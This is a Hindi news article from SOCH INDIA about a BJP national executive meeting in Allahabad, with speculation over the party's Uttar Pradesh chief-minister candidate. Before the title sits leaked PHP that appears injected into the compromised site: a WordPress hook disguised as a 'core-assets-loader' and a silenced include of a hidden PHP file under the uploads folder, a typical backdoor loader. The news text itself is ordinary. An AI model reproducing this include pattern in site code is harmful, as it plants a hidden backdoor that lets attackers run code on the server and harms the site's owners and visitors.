add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इलाहाबाद में जुटे BJP दिग्गज, कार्यकारिणी बैठक में CM पर माथापच्ची – SOCH INDIA
Menu

राजनीति
इलाहाबाद में जुटे BJP दिग्गज, कार्यकारिणी बैठक में CM पर माथापच्ची

nobanner

इलाहाबाद। उत्तर प्रदेश में चुनाव का बिगुल बजने जा रहा है। संगम नगरी इलाहाबाद से आज से बीजेपी के मिशन यूपी की शुरुआत होगी। दो दिवसीय राष्ट्रीय कार्यकारिणी की बैठक में मिशन यूपी के अलावा कई मुद्दों पर चर्चा होने जा रही है। इस बैठक में पीएम मोदी समेत बीजेपी के सभी बड़े नेता शामिल हो रहे हैं। चर्चा की शुरुआत शाम 5 बजे बीजेपी अध्यक्ष अमित शाह के भाषण से होगी। इसके बाद प्रधानमंत्री मोदी भी पदाधिकारियों के साथ बैठक करेंगे। सोमवार को कार्यक्रम के आखिर में पार्टी का राजनीतिक और आर्थिक प्रस्ताव पारित किया जाएगा। कार्यकारिणी का समापन प्रधानमंत्री मोदी के संबोधन से होगा। इसके बाद प्रधानमंत्री मोदी की एक रैली भी होगी।

कार्यकारिणी की बैठक के बीच इलाहाबाद के स्वागत पोस्टर्स पार्टी के लिए एक परेशानी खड़ी कर सकते हैं। पोस्टर्स में सुलतानपुर से बीजेपी सांसद वरुण गांधी के पोस्टर्स उनकी सीएम दावेदारी की कहानी कह रहे हैं। हालांकि, बीजेपी के प्रदेश अध्यक्ष केशव प्रसाद मौर्या ने इलाहाबाद में स्पष्ट किया है कि बीजेपी को यूपी में प्रधानमंत्री नरेंद्र मोदी के अलावा किसी दूसरे नेतृत्व की जरूरत नहीं है। उनका कहना है कि पीएम मोदी के नेतृत्व का पूरे विश्व में डंका बज रहा है ऐसे में किसी दूसरे नेतृत्व की कोई जरूरत नहीं है। जब यूपी में नेतृत्व की जरूरत होगी तो राष्ट्रीय नेतृत्व ही तय करेगा कि किसे यूपी की कमान सौंपी जाएगी। बताया जा रहा है कि बीजेपी नेतृत्व इस पोस्टर दावेदारी से नाराज भी है।

इलाहाबाद में जुटे BJP दिग्गज, कार्यकारिणी बैठक में CM पर माथापच्ची
उत्तर प्रदेश में चुनाव का बिगुल बजने जा रहा है। संगम नगरी इलाहाबाद से आज से बीजेपी के मिशन यूपी की शुरुआत होगी।

पूर्व प्रदेश अध्यक्ष लक्ष्मीकांत वाजपेयी ने इलाहाबाद को कार्यकारिणी बैठक के लिए चयन करने पर कहा कि उत्तर प्रदेश का चुनाव है तो जाहिर सी बात है कि ना ही सिर्फ बीजेपी के बल्कि सभी पार्टियों के कार्यक्रम चुनाव को ध्यान में रख कर और लाभ लेने के लिए होते हैं।

दूसरी तरफ विरोधी दलों ने बीजेपी पर बैठक को लेकर हमला भी शुरू कर दिया है। जेडीयू नेता अली अनवर ने राजनाथ सिंह को सीएम उम्मीदवार बनाए जाने की अटकलों पर कहा कि ऐसा करना उनका कद घटाना होगा। बीजेपी की बैठक पर उन्होंने चुटकी ली और कहा कि पार्टी को पता है कि यहां हार गए तो उल्टे दिन शुरू हो जाएंगे।